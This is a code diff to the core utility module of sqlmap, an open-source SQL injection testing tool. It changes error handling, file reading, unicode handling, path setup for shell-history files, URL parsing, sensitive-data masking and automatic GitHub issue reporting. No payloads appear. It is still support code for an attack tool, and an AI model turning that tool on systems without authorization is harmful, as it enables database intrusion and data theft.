                     _ = urldecode(testableParameters[parameter], convall=True)
-                    if (_.strip(DUMMY_SQL_INJECTION_CHARS) != _\
+                    if (_.endswith("'") and _.count("'") == 1
                       or re.search(r'\A9{3,}', _) or re.search(DUMMY_USER_INJECTION, _))\
                       and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX):
                         warnMsg = "it appears that you have provided tainted parameter values "
@@ -572,10 +584,15 @@ def paramToDict(place, parameters=None):
                         warnMsg += "so sqlmap could be able to run properly"
                         logger.warn(warnMsg)
 
-                        message = "are you sure you want to continue? [y/N] "
+                        message = "are you really sure that you want to continue (sqlmap could have problems)? [y/N] "
                         test = readInput(message, default="N")
                         if test[0] not in ("y", "Y"):
                             raise SqlmapSilentQuitException
+                    elif not _:
+                        warnMsg = "provided value for parameter '%s' is empty. " % parameter
+                        warnMsg += "Please, always use only valid parameter values "
+                        warnMsg += "so sqlmap could be able to run properly"
+                        logger.warn(warnMsg)
 
     if conf.testParameter and not testableParameters:
         paramStr = ", ".join(test for test in conf.testParameter)
@@ -834,11 +851,19 @@ def dataToTrafficFile(data):
     except IOError, ex:
         errMsg = "something went wrong while trying "
         errMsg += "to write to the traffic file '%s' ('%s')" % (conf.trafficFile, ex)
-        raise SqlmapGenericException(errMsg)
+        raise SqlmapSystemException(errMsg)
 
 def dataToDumpFile(dumpFile, data):
-    dumpFile.write(data)
-    dumpFile.flush()
+    try:
+        dumpFile.write(data)
+        dumpFile.flush()
+    except IOError, ex:
+        if "No space left" in getUnicode(ex):
+            errMsg = "no space left on output device"
+            logger.error(errMsg)
+        else:
+            raise
+
 
 def dataToOutFile(filename, data):
     retVal = None
@@ -846,8 +871,13 @@ def dataToOutFile(filename, data):
     if data:
         retVal = os.path.join(conf.filePath, filePathToSafeString(filename))
 
-        with codecs.open(retVal, "wb", UNICODE_ENCODING) as f:
-            f.write(data)
+        try:
+            with open(retVal, "w+b") as f:
+                f.write(data)
+        except IOError, ex:
+            errMsg = "something went wrong while trying to write "
+            errMsg += "to the output file ('%s')" % ex.message
+            raise SqlmapGenericException(errMsg)
 
     return retVal
 
@@ -866,11 +896,11 @@ def readInput(message, default=None, checkBatch=True):
     elif message[-1] == ']':
         message += " "
 
-    if kb.prependFlag:
+    if kb.get("prependFlag"):
         message = "\n%s" % message
         kb.prependFlag = False
 
-    if conf.answers:
+    if conf.get("answers"):
         for item in conf.answers.split(','):
             question = item.split('=')[0].strip()
             answer = item.split('=')[1] if len(item.split('=')) > 1 else None
@@ -886,7 +916,7 @@ def readInput(message, default=None, checkBatch=True):
                 break
 
     if retVal is None:
-        if checkBatch and conf.batch:
+        if checkBatch and conf.get("batch"):
             if isListLike(default):
                 options = ",".join(getUnicode(opt, UNICODE_ENCODING) for opt in default)
             elif default:
@@ -902,12 +932,16 @@ def readInput(message, default=None, checkBatch=True):
             retVal = default
         else:
             logging._acquireLock()
+
+            if conf.get("beep"):
+                beep()
+
             dataToStdout("\r%s" % message, forceOutput=True, bold=True)
             kb.prependFlag = False
 
             try:
                 retVal = raw_input() or default
-                retVal = getUnicode(retVal, system=True) if retVal else retVal
+                retVal = getUnicode(retVal, encoding=sys.stdin.encoding) if retVal else retVal
             except:
                 time.sleep(0.05)  # Reference: http://www.gossamer-threads.com/lists/python/python/781893
                 kb.prependFlag = True
@@ -974,13 +1008,33 @@ def sanitizeStr(value):
 
     return getUnicode(value).replace("\n", " ").replace("\r", "")
 
+def getHeader(headers, key):
+    retVal = None
+    for _ in (headers or {}):
+        if _.upper() == key.upper():
+            retVal = headers[_]
+            break
+    return retVal
+
 def checkFile(filename):
     """
-    Checks for file existence
+    Checks for file existence and readability
     """
 
-    if not os.path.isfile(filename):
-        raise SqlmapFilePathException("unable to read file '%s'" % filename)
+    valid = True
+
+    if filename is None or not os.path.isfile(filename):
+        valid = False
+
+    if valid:
+        try:
+            with open(filename, "rb"):
+                pass
+        except:
+            valid = False
+
+    if not valid:
+        raise SqlmapSystemException("unable to read file '%s'" % filename)
 
 def banner():
     """
@@ -1046,13 +1100,18 @@ def setPaths():
     paths.SQLMAP_UDF_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "udf")
     paths.SQLMAP_XML_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "xml")
     paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
-    paths.SQLMAP_OUTPUT_PATH = paths.get("SQLMAP_OUTPUT_PATH", os.path.join(os.path.expanduser("~"), ".sqlmap", "output"))
+    paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, "payloads")
 
+    _ = os.path.join(os.path.expandvars(os.path.expanduser("~")), ".sqlmap")
+    paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding())
     paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
     paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
 
     # sqlmap files
-    paths.SQLMAP_HISTORY = os.path.join(os.path.expanduser('~'), ".sqlmap_history")
+    paths.OS_SHELL_HISTORY = os.path.join(_, "os.hst")
+    paths.SQL_SHELL_HISTORY = os.path.join(_, "sql.hst")
+    paths.SQLMAP_SHELL_HISTORY = os.path.join(_, "sqlmap.hst")
+    paths.GITHUB_HISTORY = os.path.join(_, "github.hst")
     paths.SQLMAP_CONFIG = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
     paths.COMMON_COLUMNS = os.path.join(paths.SQLMAP_TXT_PATH, "common-columns.txt")
     paths.COMMON_TABLES = os.path.join(paths.SQLMAP_TXT_PATH, "common-tables.txt")
@@ -1062,8 +1121,7 @@ def setPaths():
     paths.USER_AGENTS = os.path.join(paths.SQLMAP_TXT_PATH, "user-agents.txt")
     paths.WORDLIST = os.path.join(paths.SQLMAP_TXT_PATH, "wordlist.zip")
     paths.ERRORS_XML = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
-    paths.PAYLOADS_XML = os.path.join(paths.SQLMAP_XML_PATH, "payloads.xml")
-    paths.INJECTIONS_XML = os.path.join(paths.SQLMAP_XML_PATH, "injections.xml")
+    paths.BOUNDARIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "boundaries.xml")
     paths.LIVE_TESTS_XML = os.path.join(paths.SQLMAP_XML_PATH, "livetests.xml")
     paths.QUERIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
     paths.GENERIC_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
@@ -1072,6 +1130,10 @@ def setPaths():
     paths.ORACLE_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "oracle.xml")
     paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml")
 
+    for path in paths.values():
+        if any(path.endswith(_) for _ in (".txt", ".xml", ".zip")):
+            checkFile(path)
+
 def weAreFrozen():
     """
     Returns whether we are frozen via py2exe.
@@ -1131,7 +1193,7 @@ def parseTargetDirect():
         raise SqlmapSyntaxException(errMsg)
 
     for dbmsName, data in DBMS_DICT.items():
-        if conf.dbms in data[0]:
+        if dbmsName == conf.dbms or conf.dbms.lower() in data[0]:
             try:
                 if dbmsName in (DBMS.ACCESS, DBMS.SQLITE, DBMS.FIREBIRD):
                     if remote:
@@ -1142,7 +1204,9 @@ def parseTargetDirect():
                         conf.hostname = "localhost"
                         conf.port = 0
                 elif not remote:
-                    errMsg = "missing remote connection details"
+                    errMsg = "missing remote connection details (e.g. "
+                    errMsg += "'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME' "
+                    errMsg += "or 'access://DATABASE_FILEPATH')"
                     raise SqlmapSyntaxException(errMsg)
 
                 if dbmsName in (DBMS.MSSQL, DBMS.SYBASE):
@@ -1172,7 +1236,7 @@ def parseTargetDirect():
                     pass
                 else:
                     errMsg = "sqlmap requires '%s' third-party library " % data[1]
-                    errMsg += "in order to directly connect to the database "
+                    errMsg += "in order to directly connect to the DBMS "
                     errMsg += "%s. You can download it from '%s'" % (dbmsName, data[2])
                     errMsg += ". Alternative is to use a package 'python-sqlalchemy' "
                     errMsg += "with support for dialect '%s' installed" % data[3]
@@ -1193,7 +1257,8 @@ def parseTargetUrl():
         errMsg += "on this platform"
         raise SqlmapGenericException(errMsg)
 
-    if not re.search("^http[s]*://", conf.url, re.I):
+    if not re.search("^http[s]*://", conf.url, re.I) and \
+            not re.search("^ws[s]*://", conf.url, re.I):
         if ":443/" in conf.url:
             conf.url = "https://" + conf.url
         else:
@@ -1202,7 +1267,14 @@ def parseTargetUrl():
     if CUSTOM_INJECTION_MARK_CHAR in conf.url:
         conf.url = conf.url.replace('?', URI_QUESTION_MARKER)
 
-    urlSplit = urlparse.urlsplit(conf.url)
+    try:
+        urlSplit = urlparse.urlsplit(conf.url)
+    except ValueError, ex:
+        errMsg = "invalid URL '%s' has been given ('%s'). " % (conf.url, ex)
+        errMsg += "Please be sure that you don't have any leftover characters (e.g. '[' or ']') "
+        errMsg += "in the hostname part"
+        raise SqlmapGenericException(errMsg)
+
     hostnamePort = urlSplit.netloc.split(":") if not re.search("\[.+\]", urlSplit.netloc) else filter(None, (re.search("\[.+\]", urlSplit.netloc).group(0), re.search("\](:(?P<port>\d+))?", urlSplit.netloc).group("port")))
 
     conf.scheme = urlSplit.scheme.strip().lower() if not conf.forceSSL else "https"
@@ -1214,6 +1286,8 @@ def parseTargetUrl():
 
     try:
         _ = conf.hostname.encode("idna")
+    except LookupError:
+        _ = conf.hostname.encode(UNICODE_ENCODING)
     except UnicodeError:
         _ = None
 
@@ -1238,13 +1312,13 @@ def parseTargetUrl():
     conf.url = getUnicode("%s://%s:%d%s" % (conf.scheme, ("[%s]" % conf.hostname) if conf.ipv6 else conf.hostname, conf.port, conf.path))
     conf.url = conf.url.replace(URI_QUESTION_MARKER, '?')
 
-    if not conf.referer and intersect(REFERER_ALIASES, conf.testParameter, True):
+    if not conf.referer and (intersect(REFERER_ALIASES, conf.testParameter, True) or conf.level >= 3):
         debugMsg = "setting the HTTP Referer header to the target URL"
         logger.debug(debugMsg)
         conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.REFERER, conf.httpHeaders)
-        conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url))
+        conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url.replace(CUSTOM_INJECTION_MARK_CHAR, "")))
 
-    if not conf.host and intersect(HOST_ALIASES, conf.testParameter, True):
+    if not conf.host and (intersect(HOST_ALIASES, conf.testParameter, True) or conf.level >= 5):
         debugMsg = "setting the HTTP Host header to the target URL"
         logger.debug(debugMsg)
         conf.httpHeaders = filter(lambda (key, value): key != HTTP_HEADER.HOST, conf.httpHeaders)
@@ -1273,7 +1347,7 @@ def expandAsteriskForColumns(expression):
             if expression != conf.query:
                 conf.db = db
             else:
-                expression = re.sub(r"([^\w])%s" % conf.tbl, "\g<1>%s.%s" % (conf.db, conf.tbl), expression)
+                expression = re.sub(r"([^\w])%s" % re.escape(conf.tbl), "\g<1>%s.%s" % (conf.db, conf.tbl), expression)
         else:
             conf.db = db
         conf.db = safeSQLIdentificatorNaming(conf.db)
@@ -1501,39 +1575,55 @@ def normalizePath(filepath):
 
     return retVal
 
+def safeExpandUser(filepath):
+    """
+    Patch for a Python Issue18171 (http://bugs.python.org/issue18171)
+    """
+
+    retVal = filepath
+
+    try:
+        retVal = os.path.expanduser(filepath)
+    except UnicodeDecodeError:
+        _ = locale.getdefaultlocale()
+        retVal = getUnicode(os.path.expanduser(filepath.encode(_[1] if _ and len(_) > 1 else UNICODE_ENCODING)))
+
+    return retVal
+
 def safeStringFormat(format_, params):
     """
     Avoids problems with inappropriate string format strings
 
-    >>> safeStringFormat('foobar%d%s', ('1', 2))
-    u'foobar12'
+    >>> safeStringFormat('SELECT foo FROM %s LIMIT %d', ('bar', '1'))
+    u'SELECT foo FROM bar LIMIT 1'
     """
 
     if format_.count(PAYLOAD_DELIMITER) == 2:
         _ = format_.split(PAYLOAD_DELIMITER)
-        _[1] = _[1].replace("%d", "%s")
+        _[1] = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", _[1])
         retVal = PAYLOAD_DELIMITER.join(_)
     else:
-        retVal = format_.replace("%d", "%s")
+        retVal = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", format_)
 
     if isinstance(params, basestring):
         retVal = retVal.replace("%s", params, 1)
     elif not isListLike(params):
         retVal = retVal.replace("%s", str(params), 1)
     else:
-        count, index = 0, 0
-        if retVal.count("%s") == len(params):
-            while index != -1:
-                index = retVal.find("%s")
-                if index != -1:
-                    retVal = retVal[:index] + getUnicode(params[count]) + retVal[index + 2:]
-                    count += 1
+        start, end = 0, len(retVal)
+        match = re.search(r"%s(.+)%s" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), retVal)
+        if match and PAYLOAD_DELIMITER not in match.group(1):
+            start, end = match.start(), match.end()
+        if retVal.count("%s", start, end) == len(params):
+            for param in params:
+                index = retVal.find("%s", start)
+                retVal = retVal[:index] + getUnicode(param) + retVal[index + 2:]
         else:
             count = 0
             while True:
                 match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal)
                 if match:
-                    if count > len(params):
+                    if count >= len(params):
                         raise Exception("wrong number of parameters during string formatting")
                     else:
                         retVal = re.sub(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>" % params[count], retVal, 1)
@@ -1671,13 +1761,17 @@ def getConsoleWidth(default=80):
         width = int(os.getenv("COLUMNS"))
     else:
         try:
-            process = execute("stty size", shell=True, stdout=PIPE, stderr=PIPE)
+            try:
+                FNULL = open(os.devnull, 'w')
+            except IOError:
+                FNULL = None
+            process = execute("stty size", shell=True, stdout=PIPE, stderr=FNULL or PIPE)
             stdout, _ = process.communicate()
             items = stdout.split()
 
             if len(items) == 2 and items[1].isdigit():
                 width = int(items[1])
-        except OSError:
+        except (OSError, MemoryError):
             pass
 
     if width is None:
@@ -1708,8 +1802,14 @@ def parseXmlFile(xmlFile, handler):
     Parses XML file by a given handler
     """
 
-    with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream:
-        parse(stream, handler)
+    try:
+        with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream:
+            parse(stream, handler)
+    except (SAXParseException, UnicodeError), ex:
+        errMsg = "something seems to be wrong with "
+        errMsg += "the file '%s' ('%s'). Please make " % (xmlFile, ex)
+        errMsg += "sure that you haven't made any changes to it"
+        raise SqlmapInstallationException, errMsg
 
 def getSQLSnippet(dbms, sfile, **variables):
     """
@@ -1749,7 +1849,7 @@ def getSQLSnippet(dbms, sfile, **variables):
         if choice and choice[0].lower() == "y":
             for var in variables:
                 msg = "insert value for variable '%s': " % var
-                val = readInput(msg)
+                val = readInput(msg, default="")
                 retVal = retVal.replace(r"%%%s%%" % var, val)
 
     return retVal
@@ -1763,7 +1863,7 @@ def readCachedFileContent(filename, mode='rb'):
         with kb.locks.cache:
             if filename not in kb.cache.content:
                 checkFile(filename)
-                with codecs.open(filename, mode, UNICODE_ENCODING) as f:
+                with openFile(filename, mode) as f:
                     kb.cache.content[filename] = f.read()
 
     return kb.cache.content[filename]
@@ -1828,7 +1928,7 @@ def initCommonOutputs():
     kb.commonOutputs = {}
     key = None
 
-    with codecs.open(paths.COMMON_OUTPUTS, 'r', UNICODE_ENCODING) as f:
+    with openFile(paths.COMMON_OUTPUTS, 'r') as f:
         for line in f.readlines():  # xreadlines doesn't return unicode strings when codec.open() is used
             if line.find('#') != -1:
                 line = line[:line.find('#')]
@@ -1854,31 +1954,36 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un
 
     checkFile(filename)
 
-    with codecs.open(filename, 'r', UNICODE_ENCODING, errors="ignore") if unicode_ else open(filename, 'r') as f:
-        for line in (f.readlines() if unicode_ else f.xreadlines()):  # xreadlines doesn't return unicode strings when codec.open() is used
-            if commentPrefix:
-                if line.find(commentPrefix) != -1:
-                    line = line[:line.find(commentPrefix)]
+    try:
+        with openFile(filename, 'r', errors="ignore") if unicode_ else open(filename, 'r') as f:
+            for line in (f.readlines() if unicode_ else f.xreadlines()):  # xreadlines doesn't return unicode strings when codec.open() is used
+                if commentPrefix:
+                    if line.find(commentPrefix) != -1:
+                        line = line[:line.find(commentPrefix)]
 
-            line = line.strip()
+                line = line.strip()
 
-            if not unicode_:
-                try:
-                    line = str.encode(line)
-                except UnicodeDecodeError:
-                    continue
+                if not unicode_:
+                    try:
+                        line = str.encode(line)
+                    except UnicodeDecodeError:
+                        continue
 
-            if line:
-                if lowercase:
-                    line = line.lower()
+                if line:
+                    if lowercase:
+                        line = line.lower()
 
-                if unique and line in retVal:
-                    continue
+                    if unique and line in retVal:
+                        continue
 
-                if unique:
-                    retVal[line] = True
-                else:
-                    retVal.append(line)
+                    if unique:
+                        retVal[line] = True
+                    else:
+                        retVal.append(line)
+    except (IOError, OSError, MemoryError), ex:
+        errMsg = "something went wrong while trying "
+        errMsg += "to read the content of file '%s' ('%s')" % (filename, ex)
+        raise SqlmapSystemException(errMsg)
 
     return retVal if not unique else retVal.keys()
 
@@ -1987,7 +2092,7 @@ def getPartRun(alias=True):
     else:
         return retVal
 
-def getUnicode(value, encoding=None, system=False, noneToNull=False):
+def getUnicode(value, encoding=None, noneToNull=False):
     """
     Return the unicode representation of the supplied value:
 
@@ -2003,28 +2108,25 @@ def getUnicode(value, encoding=None, system=False, noneToNull=False):
         return NULL
 
     if isListLike(value):
-        value = list(getUnicode(_, encoding, system, noneToNull) for _ in value)
+        value = list(getUnicode(_, encoding, noneToNull) for _ in value)
         return value
 
-    if not system:
-        if isinstance(value, unicode):
-            return value
-        elif isinstance(value, basestring):
-            while True:
-                try:
-                    return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING)
-                except UnicodeDecodeError, ex:
-                    value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
-        else:
+    if isinstance(value, unicode):
+        return value
+    elif isinstance(value, basestring):
+        while True:
             try:
-                return unicode(value)
-            except UnicodeDecodeError:
-                return unicode(str(value), errors="ignore")  # encoding ignored for non-basestring instances
+                return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING)
+            except UnicodeDecodeError, ex:
+                try:
+                    return unicode(value, UNICODE_ENCODING)
+                except:
+                    value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
     else:
         try:
-            return getUnicode(value, sys.getfilesystemencoding() or sys.stdin.encoding)
-        except:
-            return getUnicode(value, UNICODE_ENCODING)
+            return unicode(value)
+        except UnicodeDecodeError:
+            return unicode(str(value), errors="ignore")  # encoding ignored for non-basestring instances
 
 def longestCommonPrefix(*sequences):
     """
@@ -2179,7 +2281,7 @@ def findMultipartPostBoundary(post):
     candidates = []
 
     for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""):
-        _ = match.group(1)
+        _ = match.group(1).strip().strip('-')
         if _ in done:
             continue
         else:
@@ -2380,7 +2482,11 @@ def extractTextTagContent(page):
     [u'Title', u'foobar']
     """
 
-    page = re.sub(r"(?si)[^\s>]*%s[^<]*" % REFLECTED_VALUE_MARKER, "", page or "")
+    page = page or ""
+
+    if REFLECTED_VALUE_MARKER in page:
+        page = re.sub(r"(?si)[^\s>]*%s[^\s<]*" % REFLECTED_VALUE_MARKER, "", page)
+
     return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page)))
 
 def trimAlphaNum(value):
@@ -2440,6 +2546,9 @@ def findDynamicContent(firstPage, secondPage):
     are dynamic, proper markings will be made
     """
 
+    if not firstPage or not secondPage:
+        return
+
     infoMsg = "searching for dynamic content"
     logger.info(infoMsg)
 
@@ -2490,11 +2599,11 @@ def removeDynamicContent(page):
             if prefix is None and suffix is None:
                 continue
             elif prefix is None:
-                page = re.sub(r'(?s)^.+%s' % suffix, suffix, page)
+                page = re.sub(r'(?s)^.+%s' % re.escape(suffix), suffix, page)
             elif suffix is None:
-                page = re.sub(r'(?s)%s.+$' % prefix, prefix, page)
+                page = re.sub(r'(?s)%s.+$' % re.escape(prefix), prefix, page)
             else:
-                page = re.sub(r'(?s)%s.+%s' % (prefix, suffix), '%s%s' % (prefix, suffix), page)
+                page = re.sub(r'(?s)%s.+%s' % (re.escape(prefix), re.escape(suffix)), '%s%s' % (prefix, suffix), page)
 
     return page
 
@@ -2568,7 +2677,7 @@ def parseSqliteTableSchema(value):
         table = {}
         columns = {}
 
-        for match in re.finditer(r"(\w+)\s+(TEXT|NUMERIC|INTEGER|REAL|NONE)\b", value, re.I):
+        for match in re.finditer(r"(\w+)\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|TEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b", value, re.I):
             columns[match.group(1)] = match.group(2)
 
         table[conf.tbl] = columns
@@ -2733,14 +2842,14 @@ def getSortedInjectionTests():
             retVal = SORT_ORDER.LAST
 
         elif 'details' in test and 'dbms' in test.details:
-            if test.details.dbms in Backend.getErrorParsedDBMSes():
+            if intersect(test.details.dbms, Backend.getIdentifiedDbms()):
                 retVal = SORT_ORDER.SECOND
             else:
                 retVal = SORT_ORDER.THIRD
 
         return retVal
 
-    if Backend.getErrorParsedDBMSes():
+    if Backend.getIdentifiedDbms():
         retVal = sorted(retVal, key=priorityFunction)
 
     return retVal
@@ -2772,20 +2881,24 @@ def showHttpErrorCodes():
           if code in httplib.responses else '?', count) \
           for code, count in kb.httpErrorCodes.items())
         logger.warn(warnMsg)
+        if any((str(_).startswith('4') or str(_).startswith('5')) and _ != httplib.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes.keys()):
+            msg = "too many 4xx and/or 5xx HTTP error codes "
+            msg += "could mean that some kind of protection is involved (e.g. WAF)"
+            logger.debug(msg)
 
-def openFile(filename, mode='r'):
+def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1):
     """
     Returns file handle of a given filename
     """
 
     try:
-        return codecs.open(filename, mode, UNICODE_ENCODING, "replace")
+        return codecs.open(filename, mode, encoding, errors, buffering)
     except IOError:
         errMsg = "there has been a file opening error for filename '%s'. " % filename
         errMsg += "Please check %s permissions on a file " % ("write" if \
           mode and ('w' in mode or 'a' in mode or '+' in mode) else "read")
         errMsg += "and that it's not locked by another process."
-        raise SqlmapFilePathException(errMsg)
+        raise SqlmapSystemException(errMsg)
 
 def decodeIntToUnicode(value):
     """
@@ -2800,14 +2913,11 @@ def decodeIntToUnicode(value):
 
     if isinstance(value, int):
         try:
-            # http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_ord
-            if Backend.getIdentifiedDbms() in (DBMS.MYSQL,):
+            if value > 255:
                 _ = "%x" % value
                 if len(_) % 2 == 1:
                     _ = "0%s" % _
-                retVal = getUnicode(hexdecode(_))
-            elif value > 255:
-                retVal = unichr(value)
+                retVal = getUnicode(hexdecode(_), encoding="UTF-16" if Backend.isDbms(DBMS.MSSQL) else None)
             else:
                 retVal = getUnicode(chr(value))
         except:
@@ -2820,35 +2930,107 @@ def unhandledExceptionMessage():
     Returns detailed message about occurred unhandled exception
     """
 
-    errMsg = "unhandled exception in %s, retry your " % VERSION_STRING
-    errMsg += "run with the latest development version from the GitHub "
-    errMsg += "repository. If the exception persists, please send by e-mail "
-    errMsg += "to '%s' or open a new issue at '%s' with the following text " % (ML, ISSUES_PAGE)
-    errMsg += "and any information required to reproduce the bug. The "
+    errMsg = "unhandled exception occurred in %s. It is recommended to retry your " % VERSION_STRING
+    errMsg += "run with the latest development version from official GitHub "
+    errMsg += "repository at '%s'. If the exception persists, please open a new issue " % GIT_PAGE
+    errMsg += "at '%s' " % ISSUES_PAGE
+    errMsg += "with the following text and any other information required to "
+    errMsg += "reproduce the bug. The "
     errMsg += "developers will try to reproduce the bug, fix it accordingly "
-    errMsg += "and get back to you.\n"
-    errMsg += "sqlmap version: %s%s\n" % (VERSION, "-%s" % REVISION if REVISION else "")
+    errMsg += "and get back to you\n"
+    errMsg += "sqlmap version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:]
     errMsg += "Python version: %s\n" % PYVERSION
     errMsg += "Operating system: %s\n" % PLATFORM
-    errMsg += "Command line: %s\n" % " ".join(sys.argv)
+    errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap.py\b", "sqlmap.py", " ".join(sys.argv))
     errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None))
     errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms())
 
-    return maskSensitiveData(errMsg)
+    return errMsg
+
+def createGithubIssue(errMsg, excMsg):
+    """
+    Automatically create a Github issue with unhandled exception information
+    """
+
+    issues = []
+    try:
+        issues = getFileItems(paths.GITHUB_HISTORY, unique=True)
+    except:
+        pass
+    finally:
+        issues = set(issues)
+
+    _ = re.sub(r"'[^']+'", "''", excMsg)
+    _ = re.sub(r"\s+line \d+", "", _)
+    _ = re.sub(r'File ".+?/(\w+\.py)', "\g<1>", _)
+    _ = re.sub(r".+\Z", "", _)
+    key = hashlib.md5(_).hexdigest()[:8]
+
+    if key in issues:
+        return
+
+    msg = "\ndo you want to automatically create a new (anonymized) issue "
+    msg += "with the unhandled exception information at "
+    msg += "the official Github repository? [y/N] "
+    try:
+        test = readInput(msg, default="N")
+    except:
+        test = None
+
+    if test and test[0] in ("y", "Y"):
+        ex = None
+        errMsg = errMsg[errMsg.find("\n"):]
+
+
+        data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
+        req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN.decode("base64")})
+
+        try:
+            f = urllib2.urlopen(req)
+            content = f.read()
+        except Exception, ex:
+            content = None
+
+        issueUrl = re.search(r"https://github.com/sqlmapproject/sqlmap/issues/\d+", content or "")
+        if issueUrl:
+            infoMsg = "created Github issue can been found at the address '%s'" % issueUrl.group(0)
+            logger.info(infoMsg)
+
+            try:
+                with open(paths.GITHUB_HISTORY, "a+b") as f:
+                    f.write("%s\n" % key)
+            except:
+                pass
+        else:
+            warnMsg = "something went wrong while creating a Github issue"
+            if ex:
+                warnMsg += " ('%s')" % ex
+            if "Unauthorized" in warnMsg:
+                warnMsg += ". Please update to the latest revision"
+            logger.warn(warnMsg)
 
 def maskSensitiveData(msg):
     """
     Masks sensitive data in the supplied message
     """
 
-    retVal = msg
+    retVal = getUnicode(msg)
 
-    for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy"))):
-        regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", item)
+    for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile"))):
+        regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", getUnicode(item))
         while extractRegexResult(regex, retVal):
             value = extractRegexResult(regex, retVal)
             retVal = retVal.replace(value, '*' * len(value))
 
+    if not conf.get("hostname"):
+        match = re.search(r"(?i)sqlmap.+(-u|--url)(\s+|=)([^ ]+)", retVal)
+        if match:
+            retVal = retVal.replace(match.group(3), '*' * len(match.group(3)))
+
+
+    if getpass.getuser():
+        retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), "*" * len(getpass.getuser()), retVal)
+
     return retVal
 
 def listToStrValue(value):
@@ -2923,7 +3105,7 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
 
     retVal = content
 
-    if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism:
+    if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode:
         def _(value):
             while 2 * REFLECTED_REPLACEMENT_REGEX in value:
                 value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
@@ -2958,7 +3140,7 @@ def removeReflectiveValues(content, payload, suppressWarning=False):
                     regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
                     retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
 
-            if retVal != content and not kb.heuristicMode:
+            if retVal != content:
                 kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
                 if not suppressWarning:
                     warnMsg = "reflective value(s) found and filtering out"
@@ -3108,7 +3290,7 @@ def expandMnemonics(mnemonics, parser, args):
                     pointer = pointer.next[char]
                     pointer.current.append(option)
 
-    for mnemonic in mnemonics.split(','):
+    for mnemonic in (mnemonics or "").split(','):
